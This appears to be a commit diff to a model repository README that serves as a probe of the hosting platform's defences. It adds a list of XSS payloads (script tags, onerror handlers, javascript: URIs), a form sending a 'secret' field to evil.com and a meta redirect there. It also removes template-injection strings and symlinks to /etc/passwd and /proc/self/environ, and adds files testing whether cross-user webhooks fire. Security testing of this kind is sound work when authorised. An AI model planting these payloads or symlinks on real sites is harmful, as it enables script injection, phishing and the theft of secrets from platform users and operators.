test PR commit

README.md

@@ -1,10 +1,51 @@
 ---
 license: mit
-tags:
-  - "<img src=x onerror=alert(1)>"
-  - "{{7*7}}"
-widget:
-  - src: "javascript:alert(1)"
 ---
 # Test Model
-This is a test model with {{constructor.constructor("return this")()}} and <script>alert(1)</script>
+
+## XSS Tests
+
+### Image onerror
+<img src=x onerror=alert(1)>
+
+### Script tag
+<script>alert(document.domain)</script>
+
+### SVG onload
+<svg onload=alert(1)>
+
+### Markdown link with javascript
+[Click me](javascript:alert(1))
+
+### Data URI link  
+[Click](data:text/html,<script>alert(1)</script>)
+
+### HTML entities
+<img src=&quot;x&quot; onerror=&quot;alert(1)&quot;>
+
+### Iframe
+<iframe src=javascript:alert(1)>
+
+### Object tag
+<object data=javascript:alert(1)>
+
+### Embed
+<embed src=javascript:alert(1)>
+
+### Base tag (could redirect relative URLs)
+<base href=https://evil.com>
+
+### Form action
+<form action=https://evil.com/steal><input type=text name=secret><button>Submit</button></form>
+
+### Meta refresh
+<meta http-equiv=refresh content="0;url=https://evil.com">
+
+### Markdown with HTML
+<details><summary>Click to expand</summary><img src=x onerror=alert(1)></details>
+
+### Style injection
+<div style="background:url(javascript:alert(1))">test</div>
+
+### Event handlers in attributes
+<div onmouseover="alert(1)">hover me</div>

crlf-test.txt

@@ -0,0 +1 @@
+test

env-link

@@ -1 +0,0 @@
-/proc/self/environ

passwd-link

@@ -1 +0,0 @@
-/etc/passwd

pr-test.txt

@@ -0,0 +1 @@
+PR test content

trigger.txt

@@ -1 +1 @@
-trigger webhook
+webhook trigger test

verify-cross-user.txt

@@ -0,0 +1 @@
+Testing which webhooks fire

webhook-test.txt

@@ -0,0 +1 @@
+Testing if cross-user webhook fires

webhook-trigger-v2.txt

@@ -0,0 +1 @@
+triggered at 1771375639